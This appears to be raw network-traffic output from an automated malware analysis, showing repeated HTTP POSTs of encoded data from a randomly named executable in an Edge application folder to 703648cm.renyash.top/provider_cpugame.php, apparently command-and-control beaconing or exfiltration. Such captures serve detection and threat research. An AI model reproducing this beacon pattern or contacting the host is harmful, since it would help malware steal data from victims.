                                                                                                                      Dec 20, 2024 21:17:51.980393887 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:50 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.44975337.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:52.216418982 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:52.566857100 CET2644OUTData Raw: 5d 5b 5f 55 5d 57 51 53 5a 5b 5b 52 55 56 51 51 58 52 59 44 52 50 54 5e 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ][_U]WQSZ[[RUVQQXRYDRPT^][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"*,>0!'*-8: :"X='']'((2'+,\!50#G!"^,#
                                                                                                                      Dec 20, 2024 21:17:53.502317905 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:53.740586996 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:51 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.44975437.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:53.982399940 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:54.332503080 CET2644OUTData Raw: 58 58 5f 50 58 59 54 56 5a 5b 5b 52 55 53 51 54 58 53 59 48 52 53 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XX_PXYTVZ[[RUSQTXSYHRSTX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"*.?#-$6^.!9"*$#]%(!S?3&(;59U0#G!"^,7
                                                                                                                      Dec 20, 2024 21:17:55.263159990 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:55.496340036 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:53 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.44975537.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:55.736916065 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:56.082638979 CET2644OUTData Raw: 58 59 5f 53 58 59 54 57 5a 5b 5b 52 55 5f 51 55 58 5d 59 41 52 5c 54 5d 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XY_SXYTWZ[[RU_QUX]YAR\T]][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!*.4>*'&Y-*79&Y(''X0+%T?1 1$\!"5R'#G!"^,
                                                                                                                      Dec 20, 2024 21:17:57.007005930 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:57.350961924 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:55 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.44975637.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:57.592416048 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:57.941822052 CET2644OUTData Raw: 58 5a 5a 57 58 5b 54 51 5a 5b 5b 52 55 53 51 53 58 5c 59 41 52 5d 54 54 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XZZWX[TQZ[[RUSQSX\YAR]TT][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!A*>$)3Y'*_9(5]7\!),$((T'W2;Y6!*0#G!"^,7
                                                                                                                      Dec 20, 2024 21:17:58.868313074 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:59.100508928 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:57 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.2.44975737.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:59.340363979 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:59.691917896 CET2644OUTData Raw: 5d 5c 5a 57 5d 5e 51 54 5a 5b 5b 52 55 56 51 51 58 52 59 41 52 50 54 5a 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]\ZW]^QTZ[[RUVQQXRYARPTZ][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!@>-3)&0"_,+279>>;]$85+1 %+$"5U0#G!"^,#
                                                                                                                      Dec 20, 2024 21:18:00.611469984 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:00.844304085 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:58 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      17192.168.2.44975837.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:01.091998100 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:01.441941023 CET2644OUTData Raw: 5d 59 5f 53 5d 5c 54 56 5a 5b 5b 52 55 50 51 50 58 5f 59 45 52 53 54 5f 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]Y_S]\TVZ[[RUPQPX_YERST_][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\">>%3.\:)Y4>Z=+'!S(!01<X!>3#G!"^,
                                                                                                                      Dec 20, 2024 21:18:02.360949039 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:02.596409082 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:00 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      18192.168.2.44975937.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:02.843666077 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:03.192776918 CET2644OUTData Raw: 58 5c 5f 5f 58 5c 54 5f 5a 5b 5b 52 55 51 51 5c 58 5f 59 48 52 5c 54 5b 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X\__X\T_Z[[RUQQ\X_YHR\T[][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\">=+]=9$.,+5^#2X*4;X086<1?P2,!'#G!"^,?
                                                                                                                      Dec 20, 2024 21:18:04.112340927 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:04.344494104 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:02 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      19192.168.2.44976037.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:04.592092991 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:04.942029953 CET2644OUTData Raw: 58 5c 5a 52 5d 59 51 52 5a 5b 5b 52 55 56 51 50 58 52 59 49 52 57 54 55 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X\ZR]YQRZ[[RUVQPXRYIRWTU][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\")#>3$X"^91Y4:=4 $T+22,69R0#G!"^,#
                                                                                                                      Dec 20, 2024 21:18:05.866475105 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:06.100744009 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:04 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      20192.168.2.44976237.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:06.341312885 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:06.691951990 CET2644OUTData Raw: 5d 5e 5f 5e 5d 56 54 57 5a 5b 5b 52 55 53 51 53 58 52 59 43 52 54 54 5e 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]^_^]VTWZ[[RUSQSXRYCRTT^][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!=<>%]0X=9+X4:Y)B$3;5+2 18Y"1>0#G!"^,7
                                                                                                                      Dec 20, 2024 21:18:07.620045900 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:07.852703094 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:05 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      21192.168.2.44976837.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:08.091265917 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:08.441903114 CET2644OUTData Raw: 58 5f 5f 56 58 5b 51 52 5a 5b 5b 52 55 5e 51 55 58 59 59 47 52 50 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X__VX[QRZ[[RU^QUXYYGRPTX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!A)=,>3>'-:9(5 *Y=$,'+)+"0&+?""&0#G!"^,
                                                                                                                      Dec 20, 2024 21:18:09.361283064 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:09.596148014 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:07 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      22192.168.2.44977137.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:09.841356039 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      23192.168.2.44977737.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:10.090325117 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      24192.168.2.44978237.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:10.452033043 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:10.801179886 CET2644OUTData Raw: 58 5b 5f 51 5d 5f 54 53 5a 5b 5b 52 55 53 51 55 58 52 59 44 52 5c 54 5f 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X[_Q]_TSZ[[RUSQUXRYDR\T_][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!@)?Y)U"3-!:]%]4:-*$4$9W?2#T%+?5!U'#G!"^,7
                                                                                                                      Dec 20, 2024 21:18:11.722285032 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:11.956430912 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:09 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      25192.168.2.44978537.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:12.204051018 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:12.551309109 CET2644OUTData Raw: 5d 5c 5a 57 5d 5e 51 55 5a 5b 5b 52 55 5e 51 56 58 59 59 47 52 52 54 54 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]\ZW]^QUZ[[RU^QVXYYGRRTT][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!B>.'>:'!-8&7"_>$$?2&]8!"*'>#G!"^,
                                                                                                                      Dec 20, 2024 21:18:13.480375051 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:13.712321043 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:11 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      26192.168.2.44978937.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:13.952532053 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
